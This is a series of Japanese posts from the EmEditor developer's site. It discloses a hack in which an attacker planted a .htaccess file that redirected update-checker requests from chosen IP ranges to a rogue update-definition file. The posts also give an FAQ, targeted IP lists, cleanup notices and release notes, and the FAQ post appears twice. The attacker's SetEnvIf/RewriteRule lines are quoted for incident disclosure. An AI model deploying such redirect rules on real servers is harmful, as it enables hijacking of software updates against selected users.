今回のハッキングの事件に関して、お客様には大変ご迷惑をお掛けして申し訳ありませんでした。
EmEditor は、お客様のご意見を承りながら、私が何年間も掛けて大切に創り上げて参りましたプログラムです。皆様に安心して使っていただけるはずだった更新チェッカーがハッカーに悪用されたことについて、大変遺憾に思っておりますと共に、お客様には大変ご迷惑をお掛けして申し訳なく思っております。
お客様より、多くのご質問を頂いております。また、情報をもっと公開すべきというご意見も頂いております。当初は、ハッキングの内容まで詳細な情報を公開することには不安があったのですが、それよりも情報を共有することにより、お客様にさらにご理解いただき、また他のウェブ サイト管理者の皆様のご参考になればと思い、多くの情報を公開することに致しました。
皆様からのご質問と回答についてまとめました。
1. ハッカーの手法について
EmEditor の更新チェッカーは、Advanced Installer で作成された更新チェッカーを使用しています。EmEditor でのファイル名は、 eeupdate.exe です。この更新チェッカーは、既定の設定では、定期的に、 updates/(更新定義ファイル) をチェックしています。更新定義ファイルのファイル名は、emed32_updates.txt、emed64_updates.txt、emed32_updates_ja.txt、emed64_updates_ja.txt のいずれかになります。これらの更新定義ファイルには、インストールするインストーラーへのパス、更新内容の説明、ファイルのサイズ、更新日など、インストーラーの詳細が記述されています。(詳しくは、 https://www.advancedinstaller.com/user-guide/updates-configuration.html を参照してください)
今回の事件では、/pub/updates/ のフォルダに、ハッカーにより .htaccess ファイルが置かれていました。このファイルには、以下の内容が記述されていました。
——–
SetEnvIf Remote_Addr “106\.188\.131\.[0-9]+” install
SetEnvIf Remote_Addr “133\.6\.94\.[0-9]+” install
(… 同様に70行 …)
SetEnvIf Remote_Addr “124\.248\.207\.[0-9]+” install
RewriteEngine on
RewriteCond %{ENV:install} =1
RewriteRule (.*\.txt)$ /pub/rabe/editor.txt [L]
———
そして、ハッカーによって置かれたもう1つのファイルは、 /pub/rabe/editor.txt でした。これは、実際の更新定義ファイルに似ていました。しかし、その時は特に問題だと思わず、単純に削除してしまいました。ファイルを削除してしまったため、サーバー管理者に問い合わせて、バックアップを探したのですが、見つかりませんでした。もし、このファイルを削除せずにバックアップを取っておけば、さらに多くの情報を見つけることができたので、これについては、非常に残念で悔いが残っています。大変、申し訳ありません。
したがって、/pub/rabe/editor.txt にある更新定義ファイルの内容によっては、実際にマルウェアだったのか、無害のファイルだったのか、あるいは、ハッカーが実際のマルウェアを導入する前のテスト段階だったのか、現在のところ、断定できないでいます。
2. 自動インストールは有効にしておらず、更新チェックが有効の場合には、問題はありませんか?
実際にインストールが行われていなければ問題はありません。自動インストールは、既定では無効になっています。自動インストールが有効になっていなければ、お客様が、手動で、更新を指定しない限り、自動的にインストールが行われることはありません。更新をチェックしただけで実際の更新 (インストール) を行っていなければ、問題はありません。
3. 更新チェックの実行条件は?
更新チェックは、EmEditor を起動時で、指定されている日数間隔で行われます。(既定は、EmEditor のバージョンにより 1日~5日)。EmEditor を起動しない限り、更新チェックが実行されることはありません。
4. 感染リスクのある時間帯の判断根拠は?
私が問題のファイル (.htaccess と editor.txt) の存在に気付いて削除したのは、日本時間の 8/19 午前 3:20 頃でした。サーバー会社による最後のバックアップが取られたのが、8/18 午後 10:36 でしたが、そのバックアップにこれらのファイルが存在しなかったため、問題のファイルが置かれた時間は、最後にバックアップが取られた後ということになります。
5. 現在公表されている以前の時間帯で、更新チェックの問題が無かったことは確認済みですか?
これについては、残念ながら、確実に問題がなかったと断言はできません。しかし、毎日、サーバー上のファイルの変更は監視していて、以前には、このような問題には気付いたことがありませんでした。
6. 感染するウイルスの種類は?
問題のファイル editor.txt を削除してしまったため、本当にマルウェアがリダイレクトされていたかも判断できない状態です。したがって、感染されるウィルスの種類も特定できていません。実際にはマルウェアやウィルスではなかった可能性があります。
7. 実際にマルウェアに感染された組織は?
現在のところ、マルウェアやウィルスに感染された事例は1つの報告もありません。また、実際にマルウェアやウィルスが存在したかどうかも確認できていません。マルウェアやウィルスの感染あくまでも可能性であり、実際には、マルウェアやウィルスは存在せず、ハッカーのテスト段階でウィルス感染を未然に阻止できている可能性があることも考えられます。
8. 問題のファイルを提供できますか?
.htaccess ファイルについては手元にありますが、個々の IP アドレスが個人情報に該当しますので、お教えできるのは、上記の内容ということでご理解いただけると幸いです。もう1つのファイルである editor.txt については、削除してしまったため、バックアップにも見つからなかったため、残念ながら、手元にない状態です。これついては、本当に申し訳ありません。
9. ウイルスが置かれた原因は、XOOPSのどういう脆弱性が攻撃された可能性が高いのでしょうか?
まず最初に、ハッカーが実際に XOOPS の脆弱性を利用したかどうかについても、実際には判断できない状態ですが、可能性として書かせていただきます。
現在では削除されている、ロシア語、チェコ語、イタリア語、スペイン語、フランス語の EmEditor ウェブ サイトでは、XOOPS Cube 2.0.16a JP (2006年) が使用されていました。XOOPS には、以下のような脆弱性が報告されていますが、XOOPS にはいくつかの派生があり、必ずしもすべての事例が当てはまるとは限らないのでご留意ください。
https://www.exploit-db.com/exploits/32097
https://www.exploit-db.com/exploits/32098
https://www.exploit-db.com/exploits/5057
https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=xoops&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_exploit_text=&filter_port=0&filter_osvdb=&filter_cve=
XOOPS Cube 2.0.16a JP については、XOOPS Cube の日本バージョンの最後のバージョンで、開発が停止していました。そこで、新しい XOOPS の別の派生バージョンへは、互換性の問題で更新ができないままでいました。
10. IP アドレス一覧に私の IP が含まれていなければ問題はありませんか?
IP アドレス一覧にお客様の IP アドレスが含まれていなければ、更新チェックを行ったとしても、問題はなかったと考えられます。
11. EmEditor ホーム ページにアクセスしただけでウィルスに感染するのでしょうか?
EmEditor ホーム ページにアクセスしただけでウィルスに感染するというとは考えられません。
12. 全ファイルスキャンをすると時間がかかるため、まず最初に確認した方がよいフォルダがあれば、教えていただけると助かります。
残念ながら、実際にマルウェアが存在したかどうかもわからないため、もしマルウェアに感染されたとしても、どこにマルウェアがインストールされているかもわからない状態です。大変申し訳ありません。
13. ウィルススキャンで何も発見されなければ問題ないのでしょうか? ウィルススキャンソフトによっては検知できないということはありませんか。
残念ながら、マルウェアだったとしても、どのようなウィルスが存在したかを特定することはできません。通常に知られているウィルスであれば、Windows に付属、または市販のセキュリティ ソフトウェアで検出できると考えられます。
14. 今後の対策について
今回、問題の可能性が高い XOOPS によるサイトをすべて削除いたしましたが、ハッカーがどのような手法で悪意のあるファイルを置いたのかが分からない状態です。英語、日本語のサイトは WordPress を用いて運営されています。WordPress は、常に自動的に最新のバージョンに更新を行っており、使用しているプラグイン、テーマも毎日、常に最新版に更新を行っています。また、iThemes Security プラグインを用いて、セキュリティ レベルをできるだけ上げていますが、ハッカーの手口は非常に巧妙で、どのような対策を行っても、ハッカーを 100% 完全に防ぐことは、残念ながら難しいと言えます。そこで、WordPress を使用しないウェブサイトへの移行、サーバー ホスト会社の変更なども視野に入れて、対策を検討しています。
また、更新チェッカーを作成している Advanced Installer の作成元の会社には、状況を説明して、次の 2 つの質問を行っているところです。
(1) 更新チェッカーによりマルウェアが実際にインストールされる可能性はあるかどうか。
(2) 更新チェッカーにより、実行する更新プログラムが、デジタル署名により開発元のプログラムであることを確認してから更新する手法は可能かどうか。
デジタル署名の確認方法が可能であれば、将来のバージョンではより安心して更新できるようになるはずです。
以上です。
皆様には大変ご迷惑をお掛けして申し訳ありませんでした。
今後もよろしくお願い申し上げます。
EmEditor v14.5.4 を公開しました
/カテゴリ: EmEditor 本体/作成者: Yutaka Emura先日の更新チェッカーを利用したハッキングの事件に関して、お客様には大変ご迷惑をお掛けして申し訳ありませんでした。
本事件に対応し、念のため、本サーバーと更新チェッカーの安全が確認されるまでの間、EmEditor の更新チェッカーの機能を無効にすることに決定しました。EmEditor をご利用の皆様は、本バージョンに更新されることを強くお勧めします。
お客様の安全のため、サーバーにあった更新定義ファイルは削除させていただきました。そのため、古いバージョンの更新チェッカーは利用できなくなりました。古いバージョンから更新のチェックを行おうとすると、「更新設定ファイルが不正または見つかりません。…」というメッセージが表示されますが、不具合や異常ではありません。EmEditor の最新版へは、こちらよりダウンロードして、更新していただけますようお願い申し上げます。
v14.5.3 からの主な変更点は、次の通りです。
機能の削除
機能の追加
不具合の修正
EmEditor v14 の機能全体については、こちらをご覧ください。
EmEditor v14 は、こちらよりダウンロードしていただけます。
皆様には大変ご迷惑をお掛けして申し訳ありませんでした。
今後も EmEditor を引き続きご愛顧くださいますよう、どうぞよろしくお願い申し上げます。
ハッキングについての詳細情報
今回のハッカーによる攻撃の詳細について
/カテゴリ: 一般/作成者: Yutaka Emura今回のハッキングの事件に関して、お客様には大変ご迷惑をお掛けして申し訳ありませんでした。
EmEditor は、お客様のご意見を承りながら、私が何年間も掛けて大切に創り上げて参りましたプログラムです。皆様に安心して使っていただけるはずだった更新チェッカーがハッカーに悪用されたことについて、大変遺憾に思っておりますと共に、お客様には大変ご迷惑をお掛けして申し訳なく思っております。
お客様より、多くのご質問を頂いております。また、情報をもっと公開すべきというご意見も頂いております。当初は、ハッキングの内容まで詳細な情報を公開することには不安があったのですが、それよりも情報を共有することにより、お客様にさらにご理解いただき、また他のウェブ サイト管理者の皆様のご参考になればと思い、多くの情報を公開することに致しました。
皆様からのご質問と回答についてまとめました。
1. ハッカーの手法について
EmEditor の更新チェッカーは、Advanced Installer で作成された更新チェッカーを使用しています。EmEditor でのファイル名は、 eeupdate.exe です。この更新チェッカーは、既定の設定では、定期的に、 updates/(更新定義ファイル) をチェックしています。更新定義ファイルのファイル名は、emed32_updates.txt、emed64_updates.txt、emed32_updates_ja.txt、emed64_updates_ja.txt のいずれかになります。これらの更新定義ファイルには、インストールするインストーラーへのパス、更新内容の説明、ファイルのサイズ、更新日など、インストーラーの詳細が記述されています。(詳しくは、 https://www.advancedinstaller.com/user-guide/updates-configuration.html を参照してください)
今回の事件では、/pub/updates/ のフォルダに、ハッカーにより .htaccess ファイルが置かれていました。このファイルには、以下の内容が記述されていました。
——–
SetEnvIf Remote_Addr “106\.188\.131\.[0-9]+” install
SetEnvIf Remote_Addr “133\.6\.94\.[0-9]+” install
(… 同様に70行 …)
SetEnvIf Remote_Addr “124\.248\.207\.[0-9]+” install
RewriteEngine on
RewriteCond %{ENV:install} =1
RewriteRule (.*\.txt)$ /pub/rabe/editor.txt [L]
———
そして、ハッカーによって置かれたもう1つのファイルは、 /pub/rabe/editor.txt でした。これは、実際の更新定義ファイルに似ていました。しかし、その時は特に問題だと思わず、単純に削除してしまいました。ファイルを削除してしまったため、サーバー管理者に問い合わせて、バックアップを探したのですが、見つかりませんでした。もし、このファイルを削除せずにバックアップを取っておけば、さらに多くの情報を見つけることができたので、これについては、非常に残念で悔いが残っています。大変、申し訳ありません。
したがって、/pub/rabe/editor.txt にある更新定義ファイルの内容によっては、実際にマルウェアだったのか、無害のファイルだったのか、あるいは、ハッカーが実際のマルウェアを導入する前のテスト段階だったのか、現在のところ、断定できないでいます。
2. 自動インストールは有効にしておらず、更新チェックが有効の場合には、問題はありませんか?
実際にインストールが行われていなければ問題はありません。自動インストールは、既定では無効になっています。自動インストールが有効になっていなければ、お客様が、手動で、更新を指定しない限り、自動的にインストールが行われることはありません。更新をチェックしただけで実際の更新 (インストール) を行っていなければ、問題はありません。
3. 更新チェックの実行条件は?
更新チェックは、EmEditor を起動時で、指定されている日数間隔で行われます。(既定は、EmEditor のバージョンにより 1日~5日)。EmEditor を起動しない限り、更新チェックが実行されることはありません。
4. 感染リスクのある時間帯の判断根拠は?
私が問題のファイル (.htaccess と editor.txt) の存在に気付いて削除したのは、日本時間の 8/19 午前 3:20 頃でした。サーバー会社による最後のバックアップが取られたのが、8/18 午後 10:36 でしたが、そのバックアップにこれらのファイルが存在しなかったため、問題のファイルが置かれた時間は、最後にバックアップが取られた後ということになります。
5. 現在公表されている以前の時間帯で、更新チェックの問題が無かったことは確認済みですか?
これについては、残念ながら、確実に問題がなかったと断言はできません。しかし、毎日、サーバー上のファイルの変更は監視していて、以前には、このような問題には気付いたことがありませんでした。
6. 感染するウイルスの種類は?
問題のファイル editor.txt を削除してしまったため、本当にマルウェアがリダイレクトされていたかも判断できない状態です。したがって、感染されるウィルスの種類も特定できていません。実際にはマルウェアやウィルスではなかった可能性があります。
7. 実際にマルウェアに感染された組織は?
現在のところ、マルウェアやウィルスに感染された事例は1つの報告もありません。また、実際にマルウェアやウィルスが存在したかどうかも確認できていません。マルウェアやウィルスの感染あくまでも可能性であり、実際には、マルウェアやウィルスは存在せず、ハッカーのテスト段階でウィルス感染を未然に阻止できている可能性があることも考えられます。
8. 問題のファイルを提供できますか?
.htaccess ファイルについては手元にありますが、個々の IP アドレスが個人情報に該当しますので、お教えできるのは、上記の内容ということでご理解いただけると幸いです。もう1つのファイルである editor.txt については、削除してしまったため、バックアップにも見つからなかったため、残念ながら、手元にない状態です。これついては、本当に申し訳ありません。
9. ウイルスが置かれた原因は、XOOPSのどういう脆弱性が攻撃された可能性が高いのでしょうか?
まず最初に、ハッカーが実際に XOOPS の脆弱性を利用したかどうかについても、実際には判断できない状態ですが、可能性として書かせていただきます。
現在では削除されている、ロシア語、チェコ語、イタリア語、スペイン語、フランス語の EmEditor ウェブ サイトでは、XOOPS Cube 2.0.16a JP (2006年) が使用されていました。XOOPS には、以下のような脆弱性が報告されていますが、XOOPS にはいくつかの派生があり、必ずしもすべての事例が当てはまるとは限らないのでご留意ください。
https://www.exploit-db.com/exploits/32097
https://www.exploit-db.com/exploits/32098
https://www.exploit-db.com/exploits/5057
https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=xoops&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_exploit_text=&filter_port=0&filter_osvdb=&filter_cve=
XOOPS Cube 2.0.16a JP については、XOOPS Cube の日本バージョンの最後のバージョンで、開発が停止していました。そこで、新しい XOOPS の別の派生バージョンへは、互換性の問題で更新ができないままでいました。
10. IP アドレス一覧に私の IP が含まれていなければ問題はありませんか?
IP アドレス一覧にお客様の IP アドレスが含まれていなければ、更新チェックを行ったとしても、問題はなかったと考えられます。
11. EmEditor ホーム ページにアクセスしただけでウィルスに感染するのでしょうか?
EmEditor ホーム ページにアクセスしただけでウィルスに感染するというとは考えられません。
12. 全ファイルスキャンをすると時間がかかるため、まず最初に確認した方がよいフォルダがあれば、教えていただけると助かります。
残念ながら、実際にマルウェアが存在したかどうかもわからないため、もしマルウェアに感染されたとしても、どこにマルウェアがインストールされているかもわからない状態です。大変申し訳ありません。
13. ウィルススキャンで何も発見されなければ問題ないのでしょうか? ウィルススキャンソフトによっては検知できないということはありませんか。
残念ながら、マルウェアだったとしても、どのようなウィルスが存在したかを特定することはできません。通常に知られているウィルスであれば、Windows に付属、または市販のセキュリティ ソフトウェアで検出できると考えられます。
14. 今後の対策について
今回、問題の可能性が高い XOOPS によるサイトをすべて削除いたしましたが、ハッカーがどのような手法で悪意のあるファイルを置いたのかが分からない状態です。英語、日本語のサイトは WordPress を用いて運営されています。WordPress は、常に自動的に最新のバージョンに更新を行っており、使用しているプラグイン、テーマも毎日、常に最新版に更新を行っています。また、iThemes Security プラグインを用いて、セキュリティ レベルをできるだけ上げていますが、ハッカーの手口は非常に巧妙で、どのような対策を行っても、ハッカーを 100% 完全に防ぐことは、残念ながら難しいと言えます。そこで、WordPress を使用しないウェブサイトへの移行、サーバー ホスト会社の変更なども視野に入れて、対策を検討しています。
また、更新チェッカーを作成している Advanced Installer の作成元の会社には、状況を説明して、次の 2 つの質問を行っているところです。
(1) 更新チェッカーによりマルウェアが実際にインストールされる可能性はあるかどうか。
(2) 更新チェッカーにより、実行する更新プログラムが、デジタル署名により開発元のプログラムであることを確認してから更新する手法は可能かどうか。
デジタル署名の確認方法が可能であれば、将来のバージョンではより安心して更新できるようになるはずです。
以上です。
皆様には大変ご迷惑をお掛けして申し訳ありませんでした。
今後もよろしくお願い申し上げます。
EmEditor 更新チェックによるウィルス感染の可能性について
/カテゴリ: 一般/作成者: Yutaka Emura日頃より EmEditor をご利用いただき、誠にありがとうございます。
日本時間の 8/18 午後 10:36 から 8/19 午前 3:20 (推定) の最大約5時間弱の間に、EmEditor ホーム ページ上のサブ フォルダに、ハッカーにより、悪意のあるファイルが置かれているのが見つかりました。これにより、ある特定の IP アドレスから、EmEditor の更新チェックの機能を利用すると、EmEditor の更新ファイルではなく、悪意のあるファイルがインストールされてしまう可能性があったことがわかりました。 IP アドレスの一覧は次の通りです。
* は、0 から 255 の任意の数字であることを示します。以下の IP アドレスについては、この * の範囲の 256 個のすべての IP アドレスが、問題に該当します。
12.44.85.*
12.189.27.*
12.233.153.*
42.147.69.*
49.101.250.*
61.211.224.*
63.119.133.*
64.102.249.*
64.235.145.*
64.235.151.*
66.129.241.*
77.248.69.*
86.111.221.*
106.139.26.*
106.188.131.*
114.160.192.*
118.103.17.*
118.238.0.*
124.248.207.*
133.6.1.*
133.6.91.*
133.6.94.*
133.56.0.*
133.74.211.*
133.173.2.*
150.26.82.*
173.36.196.*
173.38.209.*
182.162.60.*
188.111.86.*
194.98.194.*
198.135.0.*
199.167.55.*
203.104.128.*
203.180.164.*
204.15.64.*
209.97.118.*
210.17.188.*
210.172.128.*
210.174.36.*
210.224.179.*
216.228.150.*
219.195.174.*
以下の IP アドレスについては、この # で示した 0 から 255 のうち、実際には、1 個の IP アドレス (0 から 255 のいずれか) のみが該当しますが、個人情報の保護の観点から、実際の IP アドレスを # で隠しています。この IP アドレスの範囲に該当されるお客様は、該当する IP アドレスかどうかをお調べいたしますので、お客様の IP アドレスを添えて、jp@emurasoft.com 宛にお問い合わせいただければ幸いです。
12.234.38.#
61.202.251.#
101.110.12.#
101.110.14.#
101.110.15.#
101.111.185.#
108.28.100.#
117.103.185.#
118.159.230.#
118.159.235.#
124.85.138.#
126.205.203.#
133.6.76.#
153.163.255.#
180.0.96.#
180.6.227.#
202.7.107.#
202.62.253.#
206.13.28.#
210.148.24.#
210.164.30.# (2個のIP)
210.169.198.#
210.175.75.#
210.233.113.#
210.237.143.#
211.7.234.#
万一、上の IP アドレスのいずれかに該当される場合で、問題の時間帯に更新チェックを行われた場合には、お客様のコンピュータにウィルスが感染されている可能性がありますので、お客様のコンピューターのウィルス スキャンを行っていただけますよう、お願い申し上げます。
お客様の IP アドレスは、www.google.com で、「My IP」と入力していただくと表示されます。
今回の対応策として、問題の可能性がある古い Xoops による外国語 Web ページをすべて削除し、サーバー管理会社により再び完全なスキャンが行われています。何か進展がございましたら、ご報告いたします。本サーバーで連絡ができない場合は、Twitter、Google+、Facebook なども利用いたします。
弊社では、今回の事態の深刻さを厳粛に受け止め、再発の防止に向けて、最善の努力を尽くす所存です。
皆様には大変ご迷惑をお掛けして申し訳ありません。
今後もよろしくお願い申し上げます。
クリーン アップ作業が終了しました
/カテゴリ: 一般/作成者: Yutaka Emura日頃より EmEditor をご利用いただき、誠にありがとうございます。
先日、ご案内いたしました通り、日本語 EmEditor ホーム ページ (本サイト) および簡体字中国語 EmEditor ホーム ページにおいて、ハッカーによる悪意のあるコードの痕跡が見つかりました。そのため、弊社では、直ちに Web サイトを停止して、サーバー会社の協力により、原因の究明とクリーン アップ作業を行いました。
先ほど、クリーン アップ作業が終了し、他の言語、およびエムソフト カスタマー センターを含む、すべてのウェブサイトにて問題がないことが確認できました。
今回の対応策として、日本語 EmEditor ホーム ページ (本サイト) のアカウントのパスワードは、すべて変更させていただきました。そして、アカウントをお持ちの皆様には、変更した旨のメールをお送りいたしました。そのメールに書かれている通り、次回ログインの前にパスワードをリセットしていただけますよう、お願い申し上げます。メールが届いていない場合には、ログインの前に「パスワードの紛失」をクリックし、お客様のユーザー名またはメール アドレスを入力してください。
なお、これを機会に、将来のハッカーへの対応策として、セキュリティのレベルをより一層高くしました。また、セキュリティのレベルを上げるため、今まで行われていた新規ユーザーの自動登録は停止させていただきましたので、新しく入会を希望されるお客様は、お問い合わせフォームを使ってご連絡ください。
皆様には大変ご迷惑をお掛けして、申し訳ありませんでした。
今後ともよろしくお願い申し上げます。
本サイトのハッカーによる攻撃について
/カテゴリ: 一般/作成者: Yutaka Emura日頃より EmEditor をご利用いただき、誠にありがとうございます。
昨日 (8/13)、日本語 EmEditor ホーム ページ (本サイト) および簡体字中国語 EmEditor ホーム ページにおいて、ハッカーによる悪意のあるコードの痕跡が見つかりました。そのため、弊社では、直ちに Web サイトを停止して、サーバー会社の協力により、原因の究明とクリーン アップ作業を行っていました。日本語のサイトにおいては、フォーラム利用者のユーザー名、パスワード、IPアドレスを盗もうとする痕跡が見つかっています。当初、サイトが改ざんされていたため、管理者の私がログインすることができなかったため、またサーバー管理者による原因究明とクリーンアップ作業の終了を待っていたため、すぐに告知することができず、ご報告が遅くなり申し訳ありませんでした。さきほど、日本語 EmEditor ホーム ページのスキャンとクリーンアップ作業が完了しました。
日本語 EmEditor ホーム ページ (本サイト) にアカウントをお持ちのお客様は、直ちにアカウントのパスワードの変更をお願いいたします。本サイトのパスワードを変更するには、フォーラム ページ内の右側のフォームによりログインの後、右上の「プロフィールを編集」をクリックしてください。ただ、パスワードの変更が強制的に必要になる方法を現在、検討中のため、再度、変更が必要になる可能性があることをご了承ください。また、同じパスワードを、エムソフト カスタマー センターや他のウェブサイトと共有されている場合には、そちらのパスワードも変更されることを強くお勧めします。
なお、英語を含む他の言語の EmEditor ホーム ページ、およびエムソフト カスタマー センターについては、現時点では、問題は見つかっていません。しかし、念のため、これらのサイトにアカウントをお持ちのお客様においても、パスワードの変更、および他のサイトと同じパスワードを共有されている場合は、それらのサイトのパスワードの変更をお勧めします。
皆様には大変ご迷惑をお掛けして申し訳ありません。現時点においても、念のため、他の言語のホーム ページのスキャン作業は継続しています。何か進展がございましたら、ご報告いたします。
今後もよろしくお願い申し上げます。
32ビット版インストーラーを更新しました
/カテゴリ: EmEditor 本体/作成者: Yutaka Emura本日、32ビット版インストーラーを差し換えました。v14.5.x 用の 32ビット版インストーラーには、「カスタム」を選択して、「プログラム ショートカットと関連付け」機能 (または、このフォルダ内のサブ機能である「トレイ アイコン」、「テキスト ファイルの関連付け」、「HTML エディタ」「ソース表示」、「プログラム メニュー ショートカット」、「デスクトップ ショートカット」、「コンテキスト メニュー」、「PATH 環境変数」、「更新のチェック」) を無効にしても、実際にはこれらの機能がインストールされてしまうという問題がありました。新しいインストーラーはこの問題を修正いたしました。新しいインストーラーのファイル名は、”emed32_14.5.3a.exe” になります。新しいインストーラーは、ダウンロード ページよりダウンロードしていただけます。
64ビット版インストーラーには変更はなく、ポータブル版にも変更はありません。また、EmEditor プログラム ファイル自体にも変更はありません。既に v14.5.3 をインストールされている大部分のお客様は、更新する必要はありません。しかし、32ビット版 v14.5.x を既にインストールされているお客様で、EmEditor を「プログラム ショートカットと関連付け」のいずれかの機能を無効にして「カスタム」を選択して再インストールされたい場合は、既にインストールされている EmEditor を一旦アンインストールして、新しいインストーラーで再インストールしていただけます。
既に影響を受けられたお客様には、ご迷惑をお掛けして、誠に申し訳ありませんでした。
今後も EmEditor を引き続きご愛顧くださいますよう、どうぞよろしくお願い申し上げます。
次期バージョンでは CSV に関する機能を強化します
/カテゴリ: EmEditor 本体/作成者: Yutaka Emuraいつも EmEditor Professional をお使いいただき、誠にありがとうございます。
EmEditor の次期バージョン、v14.6 では、CSV (TSV、DSV などの区切り値も含みます) に関する機能を強化する予定です。最近では、ビックデータ解析のために EmEditor を使用されるお客様が多くなっていて、作者としても嬉しく思います。EmEditor が、巨大な CSV の編集のために、さらに便利になるようにするには、どのような機能を追加したらいいか、どのような改善を行えばいいか、皆様のご意見を伺いたいと思います。
EmEditor の CSV のサポートに関するご意見、ご要望がございましたら、フォーラムまたは「お問い合わせ」フォームにてご連絡いただければ幸いです。
よろしくお願い申し上げます。
EmEditor v14.5.3 を公開しました
/カテゴリ: EmEditor 本体/作成者: Yutaka Emura本日、EmEditor v14.5.3 を公開いたしました。常に最新版に更新してご利用ください。
v14.5.2 からの主な変更点は、次の通りです。
機能の追加
ファイルから検索を実行すると、最初に、指定フォルダ (と、設定によってはサブ フォルダ) に存在する検索ファイルの合計数を数えるため、検索前に数秒、停止したように見えることがあります。従来の動作に戻したい場合には、レジストリ エディタで、
HKEY_CURRENT_USER\Software\EmSoft\EmEditor v3\Common
に、GrepCountFiles という DWORD 値を新規作成して、0 を代入してください。
不具合の修正
画面図など、詳しくは、こちらをご覧ください。
EmEditor v14 は、こちらよりダウンロードしていただけます。
v13 からのアップグレードは無料です。v14 を使用するには、v14 用登録キーが必要になります。v13 用登録キーをお持ちのお客様は、エムソフト カスタマー センターから無料の v14 用登録キーをご確認いただけます。旧バージョンを製品登録されているお客様を含め、80% のお客様は、既に永久ライセンスをお持ちです。まだ v13 にアップグレードされていないお客様でも、上のリンクをクリックすると、お客様がアップグレード可能かどうかを確認していただけます。
「高速リリースへの方針変更と、メジャー更新から保守プランへの移行のお知らせ」もご覧ください。
今後も EmEditor を引き続きご愛顧くださいますよう、どうぞよろしくお願い申し上げます。
EmEditor v14.5.2 を公開しました
/カテゴリ: EmEditor 本体/作成者: Yutaka Emura本日、EmEditor v14.5.2 を公開いたしました。常に最新版に更新してご利用ください。
v14.5.1 からの主な変更点は、次の通りです。
不具合の修正
画面図など、詳しくは、こちらをご覧ください。
EmEditor v14 は、こちらよりダウンロードしていただけます。
v13 からのアップグレードは無料です。v14 を使用するには、v14 用登録キーが必要になります。v13 用登録キーをお持ちのお客様は、エムソフト カスタマー センターから無料の v14 用登録キーをご確認いただけます。旧バージョンを製品登録されているお客様を含め、80% のお客様は、既に永久ライセンスをお持ちです。まだ v13 にアップグレードされていないお客様でも、上のリンクをクリックすると、お客様がアップグレード可能かどうかを確認していただけます。
「高速リリースへの方針変更と、メジャー更新から保守プランへの移行のお知らせ」もご覧ください。
今後も EmEditor を引き続きご愛顧くださいますよう、どうぞよろしくお願い申し上げます。
EmEditor v14.5.1 を公開しました
/カテゴリ: EmEditor 本体/作成者: Yutaka Emura本日、EmEditor v14.5.1 を公開いたしました。常に最新版に更新してご利用ください。
v14.5.0 からの主な変更点は、次の通りです。
不具合の修正
画面図など、詳しくは、こちらをご覧ください。
EmEditor v14 は、こちらよりダウンロードしていただけます。
v13 からのアップグレードは無料です。v14 を使用するには、v14 用登録キーが必要になります。v13 用登録キーをお持ちのお客様は、エムソフト カスタマー センターから無料の v14 用登録キーをご確認いただけます。旧バージョンを製品登録されているお客様を含め、80% のお客様は、既に永久ライセンスをお持ちです。まだ v13 にアップグレードされていないお客様でも、上のリンクをクリックすると、お客様がアップグレード可能かどうかを確認していただけます。
「高速リリースへの方針変更と、メジャー更新から保守プランへの移行のお知らせ」もご覧ください。
今後も EmEditor を引き続きご愛顧くださいますよう、どうぞよろしくお願い申し上げます。